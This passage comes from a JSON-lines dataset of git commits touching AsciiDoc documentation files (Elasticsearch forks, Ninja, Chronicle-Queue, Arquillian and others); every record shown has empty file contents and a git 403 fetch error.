\/elasticsearch,ESamir\/elasticsearch,KimTaehee\/elasticsearch,martinstuga\/elasticsearch,jpountz\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrestc\/elasticsearch,liweinan0423\/elasticsearch,achow\/elasticsearch,petabytedata\/elasticsearch,sneivandt\/elasticsearch,infusionsoft\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Uiho\/elasticsearch,JervyShi\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,jbertouch\/elasticsearch,pranavraman\/elasticsearch,infusionsoft\/elasticsearch,wuranbo\/elasticsearch,mjason3\/elasticsearch,queirozfcom\/elasticsearch,camilojd\/elasticsearch,MichaelLiZhou\/elasticsearch,markllama\/elasticsearch,JervyShi\/elasticsearch,socialrank\/elasticsearch,girirajsharma\/elasticsearch,wbowling\/elasticsearch,achow\/elasticsearch,lydonchandra\/elasticsearch,ZTE-PaaS\/elasticsearch,weipinghe\/elasticsearch,ESamir\/elasticsearch,fernandozhu\/elasticsearch,hafkensite\/elasticsearch,socialrank\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,mgalushka\/elasticsearch,abibell\/elasticsearch,NBSW\/elasticsearch,F0lha\/elasticsearch,winstonewert\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,wayeast\/elasticsearch,apepper\/elasticsearch,fred84\/elasticsearch,caengcjd\/elasticsearch,luiseduardohdbackup\/elasticsearch,zhiqinghuang\/elasticsearch,lmtwga\/elasticsearch,nknize\/elasticsearch,Chhunlong\/elasticsearch,vietlq\/elasticsearch,HarishAtGitHub\/elasticsearch,mute\/elasticsearch,uschindler\/elasticsearch,a2lin\/elasticsearch,andrejserafim\/elasticsearch,jeteve\/elasticsearch,hanswang\/elasticsearch,gmarz\/elasticsearch,KimTaehee\/elasticsearch,lchennup\/elasticsearch,GlenRSmith\/elasticsearch,nomoa\/elasticsearch,bestwpw\/elasticsearch,trangvh\/elasticsearch,wittyameta\/elasticsearch,zeroctu\/elasticsearch,StefanGor\/elasticsearch,palecur\/elasticsearch,amit-shar\/elasticsearch,njlawton\/elasticsearch,btiernay\/elasticsearch,nilabhsagar\/elasticsearch,schonfeld\/elasticsearch,acchen97\/elasticsearch,kunallimaye\/elasticsearch,iacdingping\/elasticsearch,kimimj\/elasticsearch,vietlq\/elasticsearch,IanvsPoplicola\/elasticsearch,NBSW\/elasticsearch,ZTE-PaaS\/elasticsearch,HarishAtGitHub\/elasticsearch,jpountz\/elasticsearch,mikemccand\/elasticsearch,zeroctu\/elasticsearch,ImpressTV\/elasticsearch,himanshuag\/elasticsearch,strapdata\/elassandra,Rygbee\/elasticsearch,lu
iseduardohdbackup\/elasticsearch,huanzhong\/elasticsearch,socialrank\/elasticsearch,tahaemin\/elasticsearch,Chhunlong\/elasticsearch,NBSW\/elasticsearch,Stacey-Gammon\/elasticsearch,likaiwalkman\/elasticsearch,onegambler\/elasticsearch,djschny\/elasticsearch,jango2015\/elasticsearch,rlugojr\/elasticsearch,mohit\/elasticsearch,queirozfcom\/elasticsearch,huanzhong\/elasticsearch,StefanGor\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,fekaputra\/elasticsearch,sc0ttkclark\/elasticsearch,winstonewert\/elasticsearch,polyfractal\/elasticsearch,socialrank\/elasticsearch,hydro2k\/elasticsearch,episerver\/elasticsearch,rmuir\/elasticsearch,franklanganke\/elasticsearch,apepper\/elasticsearch,vietlq\/elasticsearch,Widen\/elasticsearch,masaruh\/elasticsearch,lmtwga\/elasticsearch,HarishAtGitHub\/elasticsearch,Charlesdong\/elasticsearch,abibell\/elasticsearch,jprante\/elasticsearch,zhiqinghuang\/elasticsearch,nezirus\/elasticsearch,jbertouch\/elasticsearch,yongminxia\/elasticsearch,queirozfcom\/elasticsearch,wittyameta\/elasticsearch,markharwood\/elasticsearch,sposam\/elasticsearch,wimvds\/elasticsearch,yuy168\/elasticsearch,StefanGor\/elasticsearch,HonzaKral\/elasticsearch,markharwood\/elasticsearch,davidvgalbraith\/elasticsearch,kalburgimanjunath\/elasticsearch,slavau\/elasticsearch,Siddartha07\/elasticsearch,lydonchandra\/elasticsearch,sarwarbhuiyan\/elasticsearch,truemped\/elasticsearch,yanjunh\/elasticsearch,petabytedata\/elasticsearch,drewr\/elasticsearch,springning\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,adrianbk\/elasticsearch,weipinghe\/elasticsearch,areek\/elasticsearch,hydro2k\/elasticsearch,elasticdog\/elasticsearch,mapr\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kevinkluge\/elasticsearch,clintongormley\/elasticsearch,ouyangkongtong\/elasticsearch,mortonsykes\/elasticsearch,kubum\/elasticsearch,franklanganke\/elasticsearch,vroyer\/elassandra,xuzha\/elasticsearch,huanzhong\/elasticsearch,bawse\/elasticsearch,tebriel\/elasticsearch,clintongormley\/elasticsearch,qwerty4030\/elasticsearch,18098924759\/elasticsearch,btiernay\/elasticsearch,scottsom\/elasticsearch,dongjoon-hyun\/elasticsearch,wimvds\/elasticsearch,yongminxia\/elasticsearch,zkidkid\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,Liziyao\/elasticsearch,wbowling\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,TonyChai24\/ESSource,HonzaKral\/elasticsearch,truemped\/elasticsearch,adrianbk\/elasticsearch,lzo\/elasticsearch-1,strapdata\/elassandra5-rc,dataduke\/elasticsearch,zkidkid\/elasticsearch,kalburgimanjunath\/elasticsearch,nazarewk\/elasticsearch,HarishAtGitHub\/elasticsearch,strapdata\/elassandra-test,bawse\/elasticsearch,hafkensite\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,infusionsoft\/elasticsearch,mcku\/elasticsearch,kalimatas\/elasticsearch,amit-shar\/elasticsearch,Helen-Zhao\/elasticsearch,Widen\/elasticsearch,andrejserafim\/elasticsearch,alexshadow007\/elasticsearch,schonfeld\/elasticsearch,kingaj\/elasticsearch,jprante\/elasticsearch,rento19962\/elasticsearch,Uiho\/elasticsearch,MetSystem\/elasticsearch,AndreKR\/elasticsearch,zeroctu\/elasticsearch,rhoml\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra,nellicus\/elasticsearch,LewayneNaidoo\/elasticsearch,mmaracic\/elasticsearch,jpountz\/elasticsearch,s1monw\/elasticsearch,himanshuag\/elasticsearch,liweinan0423\/elasticsearch,infusionsoft\/elasticsearch,nknize\/elasticsearch,lzo\/elasticsearch-1,tsohil\/elasticsearch,MjAbuz\/elasticsearch,onegambler\/elasticse
arch,luiseduardohdbackup\/elasticsearch,sdauletau\/elasticsearch,kevinkluge\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jimhooker2002\/elasticsearch,truemped\/elasticsearch,YosuaMichael\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,schonfeld\/elasticsearch,yuy168\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,qwerty4030\/elasticsearch,knight1128\/elasticsearch,humandb\/elasticsearch,EasonYi\/elasticsearch,Widen\/elasticsearch,slavau\/elasticsearch,nrkkalyan\/elasticsearch,fekaputra\/elasticsearch,fekaputra\/elasticsearch,schonfeld\/elasticsearch,dpursehouse\/elasticsearch,ouyangkongtong\/elasticsearch,bestwpw\/elasticsearch,acchen97\/elasticsearch,Uiho\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra,mm0\/elasticsearch,ricardocerq\/elasticsearch,iacdingping\/elasticsearch,cwurm\/elasticsearch,ricardocerq\/elasticsearch,caengcjd\/elasticsearch,wuranbo\/elasticsearch,drewr\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,lchennup\/elasticsearch,ulkas\/elasticsearch,himanshuag\/elasticsearch,vroyer\/elasticassandra,kingaj\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,hirdesh2008\/elasticsearch,mortonsykes\/elasticsearch,pranavraman\/elasticsearch,sdauletau\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,pablocastro\/elasticsearch,mjhennig\/elasticsearch,lightslife\/elasticsearch,ouyangkongtong\/elasticsearch,Fsero\/elasticsearch,rhoml\/elasticsearch,lchennup\/elasticsearch,likaiwalkman\/elasticsearch,rmuir\/elasticsearch,obourgain\/elasticsearch,awislowski\/elasticsearch,Uiho\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,iamjakob\/elasticsearch,KimTaehee\/elasticsearch,mjason3\/elasticsearch,likaiwalkman\/elasticsearch,kcompher\/elasticsearch,Rygbee\/elasticsearch,pranavraman\/elasticsearch,hydro2k\/elasticsearch,karthikjaps\/elasticsearch,kcompher\/elasticsearch,nellicus\/elasticsearch,springning\/elasticsearch,iacdingping\/elasticsearch,masterweb121\/elasticsearch,sdauletau\/elasticsearch,areek\/elasticsearch,AndreKR\/elasticsearch,djschny\/elasticsearch,yanjunh\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,TonyChai24\/ESSource,Siddartha07\/elasticsearch,wbowling\/elasticsearch,truemped\/elasticsearch,achow\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mbrukman\/elasticsearch,kalburgimanjunath\/elasticsearch,linglaiyao1314\/elasticsearch,girirajsharma\/elasticsearch,ulkas\/elasticsearch,djschny\/elasticsearch,iantruslove\/elasticsearch,s1monw\/elasticsearch,jimhooker2002\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,gingerwizard\/elasticsearch,sc0ttkclark\/elasticsearch,18098924759\/elasticsearch,andrejserafim\/elasticsearch,dylan8902\/elasticsearch,robin13\/elasticsearch,yongminxia\/elasticsearch,KimTaehee\/elasticsearch,sreeramjayan\/elasticsearch,zeroctu\/elasticsearch,tahaemin\/elasticsearch,tahaemin\/elasticsearch,njlawton\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,LewayneNaidoo\/elasticsearch,JackyMai\/elasticsearch,ckclark\/elasticsearch,pritishppai\/elasticsearch,pozhidaevak\/elasticsearch,HarishAtGitHub\/elasticsearch,karthikjaps\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra-test,knight1128\/elasticsearch,lightslife\/elasticsearch,henakamaMSFT\/elasticsearch,weipinghe\/elasticsearch,diendt\/elasticsearch,bestwpw\/elasticsearch,btiernay\/elasticsearch,naveenhooda2000\/elasticsearch,pranavraman\/elasticsearch,artnowo\/elasticsearch,iacdingping\/elasticsearch,Shepard1212\/elasticsearch,lzo\/elasticsearch-1,petabytedata\/
elasticsearch,jprante\/elasticsearch,nomoa\/elasticsearch,iamjakob\/elasticsearch,mute\/elasticsearch,yongminxia\/elasticsearch,weipinghe\/elasticsearch,glefloch\/elasticsearch,hirdesh2008\/elasticsearch,Shekharrajak\/elasticsearch,luiseduardohdbackup\/elasticsearch,Fsero\/elasticsearch,kalimatas\/elasticsearch,JackyMai\/elasticsearch,beiske\/elasticsearch,schonfeld\/elasticsearch,tebriel\/elasticsearch,bawse\/elasticsearch,himanshuag\/elasticsearch,ulkas\/elasticsearch,karthikjaps\/elasticsearch,drewr\/elasticsearch,adrianbk\/elasticsearch,nellicus\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra-test,karthikjaps\/elasticsearch,strapdata\/elassandra-test,kalburgimanjunath\/elasticsearch,shreejay\/elasticsearch,btiernay\/elasticsearch,AndreKR\/elasticsearch,myelin\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,ckclark\/elasticsearch,episerver\/elasticsearch,mikemccand\/elasticsearch,likaiwalkman\/elasticsearch,pritishppai\/elasticsearch,rento19962\/elasticsearch,wbowling\/elasticsearch,Shekharrajak\/elasticsearch,fforbeck\/elasticsearch,rmuir\/elasticsearch,hafkensite\/elasticsearch,vroyer\/elasticassandra,camilojd\/elasticsearch,naveenhooda2000\/elasticsearch,Widen\/elasticsearch,mjhennig\/elasticsearch,andrestc\/elasticsearch,F0lha\/elasticsearch,jango2015\/elasticsearch,kevinkluge\/elasticsearch,wittyameta\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra5-rc,ESamir\/elasticsearch,sneivandt\/elasticsearch,lzo\/elasticsearch-1,gingerwizard\/elasticsearch,pablocastro\/elasticsearch,davidvgalbraith\/elasticsearch,mjhennig\/elasticsearch,elancom\/elasticsearch,scorpionvicky\/elasticsearch,vingupta3\/elasticsearch,Uiho\/elasticsearch,mm0\/elasticsearch,mcku\/elasticsearch,bestwpw\/elasticsearch,davidvgalbraith\/elasticsearch,hirdesh2008\/elasticsearch,kcompher\/elasticsearch,trangvh\/elasticsearch,amit-shar\/elasticsearch,fernandozhu\/elasticsearch,mm0\/elasticsearch,MichaelLiZhou\/elasticsearch,hydro2k\/elasticsearch,linglaiyao1314\/elasticsearch,PhaedrusTheGreek\/elasticsearch,beiske\/elasticsearch,palecur\/elasticsearch,a2lin\/elasticsearch,knight1128\/elasticsearch,HonzaKral\/elasticsearch,masterweb121\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,Liziyao\/elasticsearch,wenpos\/elasticsearch,kenshin233\/elasticsearch,C-Bish\/elasticsearch,xuzha\/elasticsearch,Collaborne\/elasticsearch,EasonYi\/elasticsearch,himanshuag\/elasticsearch,alexshadow007\/elasticsearch,jbertouch\/elasticsearch,alexshadow007\/elasticsearch,diendt\/elasticsearch,Stacey-Gammon\/elasticsearch,kunallimaye\/elasticsearch,Ansh90\/elasticsearch,Uiho\/elasticsearch,wimvds\/elasticsearch,humandb\/elasticsearch,Collaborne\/elasticsearch,infusionsoft\/elasticsearch,zhiqinghuang\/elasticsearch,sposam\/elasticsearch,sdauletau\/elasticsearch,bestwpw\/elasticsearch,kevinkluge\/elasticsearch,wayeast\/elasticsearch,cwurm\/elasticsearch,rmuir\/elasticsearch,shreejay\/elasticsearch,Shekharrajak\/elasticsearch,jango2015\/elasticsearch,beiske\/elasticsearch,andrestc\/elasticsearch,caengcjd\/elasticsearch,jchampion\/elasticsearch,trangvh\/elasticsearch,onegambler\/elasticsearch,zkidkid\/elasticsearch,kcompher\/elasticsearch,weipinghe\/elasticsearch,franklanganke\/elasticsearch,acchen97\/elasticsearch,F0lha\/elasticsearch,andrestc\/elasticsearch,EasonYi\/elasticsearch,rhoml\/elasticsearch,F0lha\/elasticsearch,tkssharma\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,linglaiyao1314\/elasticsearch,yanjunh\/elasticsearch,weipinghe\/elasticsearch,nezirus\/elast
icsearch,LeoYao\/elasticsearch,jpountz\/elasticsearch,xuzha\/elasticsearch,sc0ttkclark\/elasticsearch,cnfire\/elasticsearch-1,sreeramjayan\/elasticsearch,gfyoung\/elasticsearch,ESamir\/elasticsearch,myelin\/elasticsearch,apepper\/elasticsearch,kevinkluge\/elasticsearch,MaineC\/elasticsearch,amit-shar\/elasticsearch,mcku\/elasticsearch,LewayneNaidoo\/elasticsearch,Shekharrajak\/elasticsearch,masaruh\/elasticsearch,henakamaMSFT\/elasticsearch,elancom\/elasticsearch,mbrukman\/elasticsearch,kimimj\/elasticsearch,Widen\/elasticsearch,luiseduardohdbackup\/elasticsearch,girirajsharma\/elasticsearch,mnylen\/elasticsearch,btiernay\/elasticsearch,hirdesh2008\/elasticsearch,ricardocerq\/elasticsearch,elasticdog\/elasticsearch,Uiho\/elasticsearch,knight1128\/elasticsearch,markharwood\/elasticsearch,snikch\/elasticsearch,sdauletau\/elasticsearch,masterweb121\/elasticsearch,maddin2016\/elasticsearch,infusionsoft\/elasticsearch,Siddartha07\/elasticsearch,MaineC\/elasticsearch,markllama\/elasticsearch,sreeramjayan\/elasticsearch,Liziyao\/elasticsearch,linglaiyao1314\/elasticsearch,geidies\/elasticsearch,jpountz\/elasticsearch,Shekharrajak\/elasticsearch,lydonchandra\/elasticsearch,ImpressTV\/elasticsearch,mcku\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,apepper\/elasticsearch,18098924759\/elasticsearch,scottsom\/elasticsearch,lzo\/elasticsearch-1,mute\/elasticsearch,markwalkom\/elasticsearch,davidvgalbraith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,dataduke\/elasticsearch,Fsero\/elasticsearch,GlenRSmith\/elasticsearch,camilojd\/elasticsearch,naveenhooda2000\/elasticsearch,rhoml\/elasticsearch,hafkensite\/elasticsearch,wayeast\/elasticsearch,slavau\/elasticsearch,TonyChai24\/ESSource,Fsero\/elasticsearch,jimczi\/elasticsearch,ImpressTV\/elasticsearch,jango2015\/elasticsearch,wittyameta\/elasticsearch,lks21c\/elasticsearch,xingguang2013\/elasticsearch,fernandozhu\/elasticsearch,abibell\/elasticsearch,queirozfcom\/elasticsearch,jeteve\/elasticsearch,djschny\/elasticsearch,zhiqinghuang\/elasticsearch,gingerwizard\/elasticsearch,lchennup\/elasticsearch,diendt\/elasticsearch,sposam\/elasticsearch,lightslife\/elasticsearch,ImpressTV\/elasticsearch,ckclark\/elasticsearch,ckclark\/elasticsearch,linglaiyao1314\/elasticsearch,himanshuag\/elasticsearch,yynil\/elasticsearch,rento19962\/elasticsearch,KimTaehee\/elasticsearch,shreejay\/elasticsearch,xuzha\/elasticsearch,Brijeshrpatel9\/elasticsearch,coding0011\/elasticsearch,dpursehouse\/elasticsearch,rlugojr\/elasticsearch,zeroctu\/elasticsearch,avikurapati\/elasticsearch,NBSW\/elasticsearch,iacdingping\/elasticsearch,kingaj\/elasticsearch,vingupta3\/elasticsearch,brandonkearby\/elasticsearch,Siddartha07\/elasticsearch,cwurm\/elasticsearch,wimvds\/elasticsearch,jimczi\/elasticsearch,polyfractal\/elasticsearch,drewr\/elasticsearch,nellicus\/elasticsearch,acchen97\/elasticsearch,elancom\/elasticsearch,jimhooker2002\/elasticsearch,sarwarbhuiyan\/elasticsearch,MichaelLiZhou\/elasticsearch,lchennup\/elasticsearch,abibell\/elasticsearch,kaneshin\/elasticsearch,yuy168\/elasticsearch,rlugojr\/elasticsearch,a2lin\/elasticsearch,lightslife\/elasticsearch,sdauletau\/elasticsearch,girirajsharma\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,mapr\/elasticsearch,ouyangkongtong\/elasticsearch,iantruslove\/elasticsearch,dataduke\/elasticsearch,rlugojr\/elasticsearch,nezirus\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,wayeast\/elasticsearch,brandonkearby\/elasticsearch,JackyMai\/elasticsearch,markharwood\/elasticsearch,dataduke\/elasticsearc
h,ivansun1010\/elasticsearch,nellicus\/elasticsearch,mikemccand\/elasticsearch,rhoml\/elasticsearch,MetSystem\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,Collaborne\/elasticsearch,cwurm\/elasticsearch,MjAbuz\/elasticsearch,hirdesh2008\/elasticsearch,truemped\/elasticsearch,diendt\/elasticsearch,kalburgimanjunath\/elasticsearch,tkssharma\/elasticsearch,Brijeshrpatel9\/elasticsearch,kenshin233\/elasticsearch,jeteve\/elasticsearch,Collaborne\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,wbowling\/elasticsearch,strapdata\/elassandra5-rc,amit-shar\/elasticsearch,lks21c\/elasticsearch,mmaracic\/elasticsearch,elancom\/elasticsearch,spiegela\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,iantruslove\/elasticsearch,jchampion\/elasticsearch,infusionsoft\/elasticsearch,Ansh90\/elasticsearch,Charlesdong\/elasticsearch,caengcjd\/elasticsearch,lydonchandra\/elasticsearch,naveenhooda2000\/elasticsearch","old_file":"docs\/reference\/setup\/as-a-service.asciidoc","new_file":"docs\/reference\/setup\/as-a-service.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0baaa474267da86675f502df14cbc13ad65bc0d4","subject":"Created release notes @ 4.6.11","message":"Created release notes @ 4.6.11\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"draft-docs\/release_notes.adoc","new_file":"draft-docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06388e3e08f4bfd53172930cfed97e2fc3e9cc3f","subject":"Create boileaum.adoc (#14)","message":"Create boileaum.adoc (#14)\n\nRelated to #5","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_team\/boileaum.adoc","new_file":"_team\/boileaum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742fa13613c7104bf3ad318748b6df6306db7845","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6e5ad0f10cd8d964a200685971745c7a0ce60be","subject":"Create handsondataviz.asciidoc","message":"Create handsondataviz.asciidoc\n","repos":"JackDougherty\/datavizforall,JackDougherty\/datavizbook","old_file":"docs\/handsondataviz.asciidoc","new_file":"docs\/handsondataviz.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JackDougherty\/datavizbook.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65fb4ab6626ac891a60c88da3248093f8063de1e","subject":"Updated goals.adoc","message":"Updated goals.adoc\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa49ffc576e8f7144389449005c5e6d18af29398","subject":"Adding README.adoc","message":"Adding README.adoc\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"scratch\/README.adoc","new_file":"scratch\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f5b682bfd1f13c55a1eb6b783cbd3c61f664a7b","subject":"Describe why to use relative paths","message":"Describe why to use relative paths\n\nNinja does resolve relative paths and file system links in paths.\nTherefore, such paths pointing to the same file will not match and may\nlead to an invalid dependency graph.\n\nSigned-off-by: Fredrik Medley <2561cb753b9f9bbf117fab473f743d00967b80ea@gmail.com>\n","repos":"ninja-build\/ninja,martine\/ninja,mohamed\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,martine\/ninja,nafest\/ninja,nafest\/ninja,sgraham\/ninja,AoD314\/ninja,nicolasdespres\/ninja,Qix-\/ninja,Qix-\/ninja,mydongistiny\/ninja,nafest\/ninja,lizh06\/ninja,sxlin\/dist_ninja,moroten\/ninja,maruel\/ninja,atetubou\/ninja,vvvrrooomm\/ninja,automeka\/ninja,nicolasdespres\/ninja,sxlin\/dist_ninja,Qix-\/ninja,ninja-build\/ninja,fuchsia-mirror\/third_party-ninja,maruel\/ninja,vvvrrooomm\/ninja,tfarina\/ninja,Qix-\/ninja,iwadon\/ninja,bradking\/ninja,nico\/ninja,maruel\/ninja,fuchsia-mirror\/third_party-ninja,mohamed\/ninja,moroten\/ninja,AoD314\/ninja,moroten\/ninja,ndsol\/subninja,ninja-build\/ninja,sxlin\/dist_ninja,nicolasdespres\/ninja,ndsol\/subninja,atetubou\/ninja,mgaunard\/ninja,nico\/ninja,atetubou\/ninja,moroten\/ninja,mydongistiny\/ninja,sgraham\/ninja,vvvrrooomm\/ninja,bradking\/ninja,Maratyszcza\/ninja-pypi,mohamed\/ninja,iwadon\/ninja,lizh06\/ninja,mgaunard\/ninja,vvvrrooomm\/ninja,atetubou\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,juntalis\/ninja,mgaunard\/ninja,mydongistiny\/ninja,sgraham\/ninja,lizh06\/ninja,tfarina\/ninja,sxlin\/dist_ninja,AoD314\/ninja,juntalis\/ninja,ninja-build\/ninja,fuchsia-mirror\/third_party-ninja,nico\/ninja,juntalis\/ninja,mgaunard\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,juntalis\/ninja,automeka\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,mohamed\/ninja,bradking\/ninja,nafest\/ninja,bradking\/ninja,ndsol\/subninja,sxlin\/dist_ninja,ndsol\/subninja,sxlin\/dist_ninja,AoD314\/ninja,iwadon\/ninja,iwadon\/ninja,nico\/ninja,maruel\/ninja,automeka\/ninja,automeka\/ninja,lizh06\/ninja,Maratyszcza\/ninja-pypi,sgraham\/ninja,nicolasdespres\/ninja,martine\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested 
URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76693322eef31f6217c4e19388a0ad39bf1e7568","subject":"Note\/link to api docs.","message":"Note\/link to api docs.\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,brechin\/hypatia,Applemann\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2861dd467e47a031cfa4a8a0217205e0d90074d9","subject":"Adds travis build status","message":"Adds travis build status","repos":"MatousJobanek\/arquillian-core,bartoszmajsak\/arquillian-core,arquillian\/arquillian-core,rhusar\/arquillian-core,bartoszmajsak\/arquillian-core,rhusar\/arquillian-core,MatousJobanek\/arquillian-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/arquillian-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"106f45e8572ec750b85f1414d62bd73cca2b6639","subject":"Add Coverity Scan badge to readme","message":"Add Coverity Scan badge to readme\n\n[skip ci]\n","repos":"lassik\/respace,lassik\/respace","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/respace.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"5652ecc94e06f8b7107869c9090ba26f0f9b4c39","subject":"asciidoc formatting Signed-off-by:Ondrej Mihalyi <ondrej.mihalyi@gmail.com>","message":"asciidoc formatting\nSigned-off-by:Ondrej Mihalyi <0548979e2ac15cccb3e6ca41d0de8b4627382aff@gmail.com>","repos":"jbosstm\/microprofile-sandbox","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosstm\/microprofile-sandbox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9744dec71741a7c6935d73e5f1e7d59d20e4e13","subject":"y2b create post 3 Cool Tech Deals - #10","message":"y2b create post 3 Cool Tech Deals - #10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-12-3-Cool-Tech-Deals--10.adoc","new_file":"_posts\/2015-10-12-3-Cool-Tech-Deals--10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18ebd86e8516547becdc21eadbe3acb37d5c4057","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL 